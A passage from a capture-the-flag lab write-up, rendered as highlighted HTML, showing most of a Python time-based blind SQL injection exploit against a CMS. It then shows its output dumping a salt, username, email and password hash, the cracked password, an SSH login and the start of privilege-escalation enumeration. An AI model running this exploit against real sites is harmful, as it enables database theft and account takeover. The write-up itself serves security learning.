&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">print&lt;/span>(&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>&lt;span style="color:#b8bb26">\033&lt;/span>&lt;span style="color:#b8bb26">c&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">print&lt;/span>(output)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">print&lt;/span>(&lt;span style="color:#b8bb26">&amp;#39;[*] Try: &amp;#39;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> value)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">beautify_print&lt;/span>():
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">global&lt;/span> output
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">print&lt;/span>(&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>&lt;span style="color:#b8bb26">\033&lt;/span>&lt;span style="color:#b8bb26">c&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">print&lt;/span>(output)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">dump_salt&lt;/span>():
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">global&lt;/span> flag
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">global&lt;/span> salt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">global&lt;/span> output
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ord_salt &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ord_salt_temp &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">while&lt;/span> flag:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> flag &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#fe8019">False&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">for&lt;/span> i &lt;span style="color:#fe8019">in&lt;/span> &lt;span style="color:#fabd2f">range&lt;/span>(&lt;span style="color:#d3869b">0&lt;/span>, &lt;span style="color:#fabd2f">len&lt;/span>(dictionary)):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> temp_salt &lt;span style="color:#fe8019">=&lt;/span> salt &lt;span style="color:#fe8019">+&lt;/span> dictionary[i]
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ord_salt_temp &lt;span style="color:#fe8019">=&lt;/span> ord_salt &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#fabd2f">hex&lt;/span>(&lt;span style="color:#fabd2f">ord&lt;/span>(dictionary[i]))[&lt;span style="color:#d3869b">2&lt;/span>:]
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> beautify_print_try(temp_salt)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> payload &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;a,b,1,5))+and+(select+sleep(&amp;#34;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#fabd2f">str&lt;/span>(TIME) &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;)+from+cms_siteprefs+where+sitepref_value+like+0x&amp;#34;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> ord_salt_temp &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;25+and+sitepref_name+like+0x736974656d61736b)+--+&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> url &lt;span style="color:#fe8019">=&lt;/span> url_vuln &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;amp;m1_idlist=&amp;#34;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> payload
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> start_time &lt;span style="color:#fe8019">=&lt;/span> time&lt;span style="color:#fe8019">.&lt;/span>time()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> r &lt;span style="color:#fe8019">=&lt;/span> session&lt;span style="color:#fe8019">.&lt;/span>get(url)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> elapsed_time &lt;span style="color:#fe8019">=&lt;/span> time&lt;span style="color:#fe8019">.&lt;/span>time() &lt;span style="color:#fe8019">-&lt;/span> start_time
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> elapsed_time &lt;span style="color:#fe8019">&amp;gt;=&lt;/span> TIME:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> flag &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#fe8019">True&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">break&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> flag:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> salt &lt;span style="color:#fe8019">=&lt;/span> temp_salt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ord_salt &lt;span style="color:#fe8019">=&lt;/span> ord_salt_temp
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> flag &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#fe8019">True&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> output &lt;span style="color:#fe8019">+=&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;&lt;/span>&lt;span style="color:#b8bb26">\n&lt;/span>&lt;span style="color:#b8bb26">[+] Salt for password found: &amp;#39;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> salt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">dump_password&lt;/span>():
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">global&lt;/span> flag
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">global&lt;/span> password
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">global&lt;/span> output
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ord_password &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ord_password_temp &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">while&lt;/span> flag:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> flag &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#fe8019">False&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">for&lt;/span> i &lt;span style="color:#fe8019">in&lt;/span> &lt;span style="color:#fabd2f">range&lt;/span>(&lt;span style="color:#d3869b">0&lt;/span>, &lt;span style="color:#fabd2f">len&lt;/span>(dictionary)):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> temp_password &lt;span style="color:#fe8019">=&lt;/span> password &lt;span style="color:#fe8019">+&lt;/span> dictionary[i]
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ord_password_temp &lt;span style="color:#fe8019">=&lt;/span> ord_password &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#fabd2f">hex&lt;/span>(&lt;span style="color:#fabd2f">ord&lt;/span>(dictionary[i]))[&lt;span style="color:#d3869b">2&lt;/span>:]
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> beautify_print_try(temp_password)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> payload &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;a,b,1,5))+and+(select+sleep(&amp;#34;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#fabd2f">str&lt;/span>(TIME) &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;)+from+cms_users&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> payload &lt;span style="color:#fe8019">+=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;+where+password+like+0x&amp;#34;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> ord_password_temp &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;25+and+user_id+like+0x31)+--+&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> url &lt;span style="color:#fe8019">=&lt;/span> url_vuln &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;amp;m1_idlist=&amp;#34;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> payload
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> start_time &lt;span style="color:#fe8019">=&lt;/span> time&lt;span style="color:#fe8019">.&lt;/span>time()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> r &lt;span style="color:#fe8019">=&lt;/span> session&lt;span style="color:#fe8019">.&lt;/span>get(url)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> elapsed_time &lt;span style="color:#fe8019">=&lt;/span> time&lt;span style="color:#fe8019">.&lt;/span>time() &lt;span style="color:#fe8019">-&lt;/span> start_time
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> elapsed_time &lt;span style="color:#fe8019">&amp;gt;=&lt;/span> TIME:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> flag &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#fe8019">True&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">break&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> flag:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> password &lt;span style="color:#fe8019">=&lt;/span> temp_password
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ord_password &lt;span style="color:#fe8019">=&lt;/span> ord_password_temp
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> flag &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#fe8019">True&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> output &lt;span style="color:#fe8019">+=&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;&lt;/span>&lt;span style="color:#b8bb26">\n&lt;/span>&lt;span style="color:#b8bb26">[+] Password found: &amp;#39;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> password
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">dump_username&lt;/span>():
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">global&lt;/span> flag
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">global&lt;/span> db_name
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">global&lt;/span> output
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ord_db_name &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ord_db_name_temp &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">while&lt;/span> flag:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> flag &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#fe8019">False&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">for&lt;/span> i &lt;span style="color:#fe8019">in&lt;/span> &lt;span style="color:#fabd2f">range&lt;/span>(&lt;span style="color:#d3869b">0&lt;/span>, &lt;span style="color:#fabd2f">len&lt;/span>(dictionary)):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> temp_db_name &lt;span style="color:#fe8019">=&lt;/span> db_name &lt;span style="color:#fe8019">+&lt;/span> dictionary[i]
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ord_db_name_temp &lt;span style="color:#fe8019">=&lt;/span> ord_db_name &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#fabd2f">hex&lt;/span>(&lt;span style="color:#fabd2f">ord&lt;/span>(dictionary[i]))[&lt;span style="color:#d3869b">2&lt;/span>:]
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> beautify_print_try(temp_db_name)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> payload &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;a,b,1,5))+and+(select+sleep(&amp;#34;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#fabd2f">str&lt;/span>(TIME) &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;)+from+cms_users+where+username+like+0x&amp;#34;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> ord_db_name_temp &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;25+and+user_id+like+0x31)+--+&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> url &lt;span style="color:#fe8019">=&lt;/span> url_vuln &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;amp;m1_idlist=&amp;#34;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> payload
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> start_time &lt;span style="color:#fe8019">=&lt;/span> time&lt;span style="color:#fe8019">.&lt;/span>time()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> r &lt;span style="color:#fe8019">=&lt;/span> session&lt;span style="color:#fe8019">.&lt;/span>get(url)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> elapsed_time &lt;span style="color:#fe8019">=&lt;/span> time&lt;span style="color:#fe8019">.&lt;/span>time() &lt;span style="color:#fe8019">-&lt;/span> start_time
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> elapsed_time &lt;span style="color:#fe8019">&amp;gt;=&lt;/span> TIME:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> flag &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#fe8019">True&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">break&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> flag:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> db_name &lt;span style="color:#fe8019">=&lt;/span> temp_db_name
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ord_db_name &lt;span style="color:#fe8019">=&lt;/span> ord_db_name_temp
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> output &lt;span style="color:#fe8019">+=&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;&lt;/span>&lt;span style="color:#b8bb26">\n&lt;/span>&lt;span style="color:#b8bb26">[+] Username found: &amp;#39;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> db_name
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> flag &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#fe8019">True&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">dump_email&lt;/span>():
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">global&lt;/span> flag
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">global&lt;/span> email
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">global&lt;/span> output
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ord_email &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ord_email_temp &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">while&lt;/span> flag:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> flag &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#fe8019">False&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">for&lt;/span> i &lt;span style="color:#fe8019">in&lt;/span> &lt;span style="color:#fabd2f">range&lt;/span>(&lt;span style="color:#d3869b">0&lt;/span>, &lt;span style="color:#fabd2f">len&lt;/span>(dictionary)):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> temp_email &lt;span style="color:#fe8019">=&lt;/span> email &lt;span style="color:#fe8019">+&lt;/span> dictionary[i]
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ord_email_temp &lt;span style="color:#fe8019">=&lt;/span> ord_email &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#fabd2f">hex&lt;/span>(&lt;span style="color:#fabd2f">ord&lt;/span>(dictionary[i]))[&lt;span style="color:#d3869b">2&lt;/span>:]
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> beautify_print_try(temp_email)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> payload &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;a,b,1,5))+and+(select+sleep(&amp;#34;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#fabd2f">str&lt;/span>(TIME) &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;)+from+cms_users+where+email+like+0x&amp;#34;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> ord_email_temp &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;25+and+user_id+like+0x31)+--+&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> url &lt;span style="color:#fe8019">=&lt;/span> url_vuln &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;amp;m1_idlist=&amp;#34;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> payload
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> start_time &lt;span style="color:#fe8019">=&lt;/span> time&lt;span style="color:#fe8019">.&lt;/span>time()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> r &lt;span style="color:#fe8019">=&lt;/span> session&lt;span style="color:#fe8019">.&lt;/span>get(url)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> elapsed_time &lt;span style="color:#fe8019">=&lt;/span> time&lt;span style="color:#fe8019">.&lt;/span>time() &lt;span style="color:#fe8019">-&lt;/span> start_time
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> elapsed_time &lt;span style="color:#fe8019">&amp;gt;=&lt;/span> TIME:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> flag &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#fe8019">True&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">break&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> flag:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> email &lt;span style="color:#fe8019">=&lt;/span> temp_email
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ord_email &lt;span style="color:#fe8019">=&lt;/span> ord_email_temp
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> output &lt;span style="color:#fe8019">+=&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;&lt;/span>&lt;span style="color:#b8bb26">\n&lt;/span>&lt;span style="color:#b8bb26">[+] Email found: &amp;#39;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> email
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> flag &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#fe8019">True&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>dump_salt()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>dump_username()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>dump_email()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>dump_password()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> options&lt;span style="color:#fe8019">.&lt;/span>cracking:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">print&lt;/span>(&lt;span style="color:#b8bb26">&amp;#34;[*] Now try to crack password&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> crack_password()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>beautify_print()
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>We can crack the admin password using this exploit.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> python3.9 sql-injection.py -u http://10.10.38.40/simple/ --crack -w /usr/share/wordlists/rockyou.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">[&lt;/span>+&lt;span style="color:#fe8019">]&lt;/span> Salt &lt;span style="color:#fe8019">for&lt;/span> password found: 1dac0d92e9fa6bb2
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">[&lt;/span>+&lt;span style="color:#fe8019">]&lt;/span> Username found: mitch
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">[&lt;/span>+&lt;span style="color:#fe8019">]&lt;/span> Email found: admin@admin.com
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">[&lt;/span>+&lt;span style="color:#fe8019">]&lt;/span> Password found: 0c01f4468bd75d7a84c7eb73846e8d96
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">[&lt;/span>+&lt;span style="color:#fe8019">]&lt;/span> Password cracked: secret
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Now we can use this credentials to SSH into the machine.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> ssh mitch@10.10.38.40 -p &lt;span style="color:#d3869b">2222&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>The authenticity of host &lt;span style="color:#b8bb26">&amp;#39;[10.10.38.40]:2222 ([10.10.38.40]:2222)&amp;#39;&lt;/span> can&lt;span style="color:#b8bb26">&amp;#39;t be established.
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">ED25519 key fingerprint is SHA256:iq4f0XcnA5nnPNAufEqOpvTbO8dOJPcHGgmeABEdQ5g.
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">This key is not known by any other names
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">Warning: Permanently added &amp;#39;&lt;/span>&lt;span style="color:#fe8019">[&lt;/span>10.10.38.40&lt;span style="color:#fe8019">]&lt;/span>:2222&lt;span style="color:#b8bb26">&amp;#39; (ED25519) to the list of known hosts.
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">mitch@10.10.38.40&amp;#39;&lt;/span>s password:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Welcome to Ubuntu 16.04.6 LTS &lt;span style="color:#fe8019">(&lt;/span>GNU/Linux 4.15.0-58-generic i686&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> * Documentation: https://help.ubuntu.com
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> * Management: https://landscape.canonical.com
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> * Support: https://ubuntu.com/advantage
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">0&lt;/span> packages can be updated.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">0&lt;/span> updates are security updates.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Last login: Mon Aug &lt;span style="color:#d3869b">19&lt;/span> 18:13:41 &lt;span style="color:#d3869b">2019&lt;/span> from 192.168.0.190
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>$ ls
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>user.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>$ cat user.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>******************
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;hr>
&lt;h1 id="privilege-escalation">Privilege Escalation&lt;/h1>
&lt;h2 id="local-enumeration">Local Enumeration&lt;/h2>
&lt;p>First things first:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>mitch@Machine:~$ whoami
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>mitch
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>mitch@Machine:~$ id
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>uid&lt;span style="color:#fe8019">=&lt;/span>1001&lt;span style="color:#fe8019">(&lt;/span>mitch&lt;span style="color:#fe8019">)&lt;/span> gid&lt;span style="color:#fe8019">=&lt;/span>1001&lt;span style="color:#fe8019">(&lt;/span>mitch&lt;span style="color:#fe8019">)&lt;/span> groups&lt;span style="color:#fe8019">=&lt;/span>1001&lt;span style="color:#fe8019">(&lt;/span>mitch&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>mitch@Machine:~$ uname -a
